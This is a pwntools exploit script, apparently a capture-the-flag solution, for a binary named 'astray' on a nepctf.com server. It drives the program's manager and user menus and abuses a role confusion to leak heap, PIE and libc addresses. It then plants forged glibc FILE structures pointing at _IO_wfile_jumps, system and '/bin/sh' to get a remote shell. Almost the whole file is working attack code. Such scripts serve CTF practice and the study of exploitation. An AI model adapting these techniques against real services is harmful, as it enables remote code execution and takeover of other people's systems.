| from pwn import *
# pwntools context shared by every helper below.
context.terminal = ["tmux", "splitw", "-h", "-l", "190"]  # where gdb.attach() opens its pane
context.log_level = 'debug'  # tube traffic is echoed to the console
context(arch="amd64", os="linux")

# Leak-derived bases; they start at 0 and are reassigned at module level once leaked.
libc_base = heap_base = pie = 0x0
def getshell():
    """Return ``(system, binsh)`` addresses rebased on the module-level ``libc_base``.

    ``system`` comes from the libc symbol table; ``binsh`` is the first
    ``b'/bin/sh\\x00'`` match found by ``libc.search``.  Only meaningful after
    ``libc_base`` has been filled in from a leak.

    Raises:
        StopIteration: if ``libc.search`` yields no match.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr
# Short aliases over the global tube ``p`` and the leak-derived bases.
# ``p`` is assigned later at module level; every alias resolves it at call time.
def r(a):
    """Receive ``a`` bytes from ``p``."""
    return p.recv(a)


def rl(a=False):
    """Receive one line; ``a`` is forwarded as ``recvline``'s first argument."""
    return p.recvline(a)


def ru(a):
    """Receive up to and including delimiter ``a``."""
    return p.recvuntil(a)


def s(x):
    """Send ``x`` as-is."""
    return p.send(x)


def sl(x):
    """Send ``x`` followed by a newline."""
    return p.sendline(x)


def sa(a, b):
    """Wait for ``a``, then send ``b``."""
    return p.sendafter(a, b)


def sla(a, b):
    """Wait for ``a``, then send ``b`` plus a newline."""
    return p.sendlineafter(a, b)


def shell():
    """Hand the tube over to the terminal."""
    return p.interactive()


def li(offset):
    """Rebase ``offset`` on the current ``libc_base``."""
    return libc_base + offset


def lis(func):
    """Address of libc symbol ``func`` rebased on ``libc_base``."""
    return libc_base + libc.symbols[func]


def pi(offset):
    """Rebase ``offset`` on the current ``pie`` base."""
    return pie + offset


def he(offset):
    """Rebase ``offset`` on the current ``heap_base``."""
    return heap_base + offset


def l32():
    """Read until a 0xf7 byte, zero-pad the last 4 bytes and unpack with ``u32``."""
    return u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))


def l64():
    """Read until a 0x7f byte, zero-pad the last 6 bytes to 8 and unpack with ``u64``."""
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))


def uu32():
    """Receive exactly 4 bytes and unpack with ``u32``."""
    return u32(p.recv(4).ljust(4, b'\x00'))


def uu64():
    """Receive exactly 6 bytes, zero-pad to 8 and unpack with ``u64``."""
    return u64(p.recv(6).ljust(8, b'\x00'))


def ggg():
    """Attach gdb to ``p`` and then ``pause()``; returns both results as a tuple."""
    return (gdb.attach(p), pause())
def manwrite(index, concent):
    """Manager-role write to slot ``index`` with raw bytes ``concent``.

    Answers the role prompt with ``1``, the action prompt with ``MANAGER_write``
    and the slot prompt with ``index``; ``pause()`` waits for a keypress before
    the content is sent.  (``concent`` keeps its original spelling; callers in
    this file pass it positionally.)
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1')
    p.sendafter(b'visit user(MANAGER_visit)\n', b'MANAGER_write')
    p.sendlineafter(b'1-19: manager can visit\n', str(index).encode())
    pause()
    p.send(concent)
def manread(index):
    """Manager-role read of slot ``index``.

    Answers the role prompt with ``1``, the action prompt with ``MANAGER_read``
    and the slot prompt with ``index``; the reply is left on the tube for the
    caller to consume.
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1')
    p.sendafter(b'visit user(MANAGER_visit)\n', b'MANAGER_read')
    p.sendlineafter(b'1-19: manager can visit\n', str(index).encode())
def visitr(index):
    """Manager "visit" of slot ``index`` in read mode (sub-option ``1``).

    Role ``1``, action ``MANAGER_visit``, slot ``index``, then ``1`` at the
    visit sub-menu.  The reply is left on the tube for the caller.
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1')
    p.sendafter(b'visit user(MANAGER_visit)\n', b'MANAGER_visit')
    p.sendlineafter(b'1-19: manager can visit\n', str(index).encode())
    p.sendlineafter(b'2: manager visit user to write to user_logs\n', b'1')
def visitw(index, content):
    """Manager "visit" of slot ``index`` in write mode (sub-option ``2``).

    Role ``1``, action ``MANAGER_visit``, slot ``index``, ``2`` at the visit
    sub-menu; ``pause()`` waits for a keypress before ``content`` is sent raw.
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1')
    p.sendafter(b'visit user(MANAGER_visit)\n', b'MANAGER_visit')
    p.sendlineafter(b'1-19: manager can visit\n', str(index).encode())
    p.sendlineafter(b'2: manager visit user to write to user_logs\n', b'2')
    pause()
    p.send(content)
def userr(index):
    """User-role read of slot ``index``.

    Role ``1000``, action ``USER_read``, then ``index`` at the ``10-19`` slot
    prompt.  The reply is left on the tube for the caller.
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1000')
    p.sendafter(b'user write to logs(USER_write)\n', b'USER_read')
    p.sendlineafter(b'10-19: user can visit\n', str(index).encode())
def userw(index, content):
    """User-role write of raw bytes ``content`` to slot ``index``.

    Role ``1000``, action ``USER_write``, ``index`` at the ``10-19`` slot
    prompt; ``pause()`` waits for a keypress before ``content`` is sent.
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1000')
    p.sendafter(b'user write to logs(USER_write)\n', b'USER_write')
    p.sendlineafter(b'10-19: user can visit\n', str(index).encode())
    pause()
    p.send(content)
def attack(index):
    """Select the user role (``1000``) but answer the user action prompt with
    the manager action string ``MANAGER_visit``, then send ``index`` at the
    ``10-19`` slot prompt.  Nothing is read back here.
    """
    p.sendlineafter(b'(1:manager 1000:user)\n', b'1000')
    p.sendafter(b'user write to logs(USER_write)\n', b'MANAGER_visit')
    p.sendlineafter(b'10-19: user can visit\n', str(index).encode())
# Binaries used by the rest of the script; paths are relative to the working directory.
elf = ELF('./astray')
libc = ELF('./libc.so.6')
# Remote tube; every helper above talks through this global.
p = remote("nepctf32-unsz-rtgi-s43y-ymc9bujpw004.nepctf.com", 443, ssl=True)
# First manager read: after skipping 8 bytes the reply carries a 6-byte value,
# then 2 more bytes, then another 6-byte value.  The constant subtractions
# (0x22d0, 0x41a0) are build-specific offsets from the original script — TODO confirm
# against the target binary/heap layout before reuse.
manread(0)
r(8)
heap_base=uu64()-0x22d0
r(2)
pie=uu64()-0x41a0
print(hex(heap_base))
print(hex(pie))
# Three more interactions whose payloads are built from the two bases above.
manwrite(2,p64(he(0x4a0+8))+p64(pie+0x4040))
attack(0)
visitw(1,p64(1)+p64(he(0x22d0))+p64(he(0x4a0-0x8)))
# Visit-read of slot 3 returns a 6-byte value; 0x21b6a0 is the assumed
# distance from the libc base for this libc build — TODO confirm.
visitr(3)
libc_base=uu64()-0x21b6a0
print(hex(libc_base))
# libc-relative addresses from the original script; ogg1..ogg7, setcontext_61
# and binsh are not referenced anywhere later in this file.
ogg1, ogg2, ogg3, ogg4, ogg5, ogg6, ogg7 = (
    li(off) for off in (0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43)
)
stdout = lis("_IO_2_1_stdout_")
IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
setcontext_61 = libc_base + libc.sym['setcontext'] + 61
system, binsh = getshell()
# Zero-filled buffer for manager slot 7: flat() places each dict value at its
# byte-offset key, padding the gaps with filler.
payload=flat( {
    0x20:p64(1),
    0x18:p64(0),
    0xe0:p64(he(0x9a0+0x50)),
    (0x50+0x18):p64(system),
},filler=b'\x00' )
manwrite(7,payload)
# Manager visit-write to slot 1: six qwords, the first rebased on libc_base,
# the fifth being the _IO_2_1_stdout_ address computed above.
visitw(1,p64(li(0x21b6a0))+p64(0)*3+p64(stdout)+p64(3))
# User write to slot 0: zero-filled buffer, each value placed at its
# byte-offset key (list values are concatenated by flat()).
pay=flat( {
    0x0:[b'/bin/sh\x00'],
    0x20:[p64(0)],
    0x28:[p64(1)],
    0xc0:[p64(0)],
    0xd8:[p64(IO_wfile_jumps+0x10)],
    0x88:[p64(he(0x600)+0x90)],
    0xa0:[p64(he(0x9a0))]
},filler=b'\x00')
userw(0,pay)
# Hand the tube over to the terminal.
shell()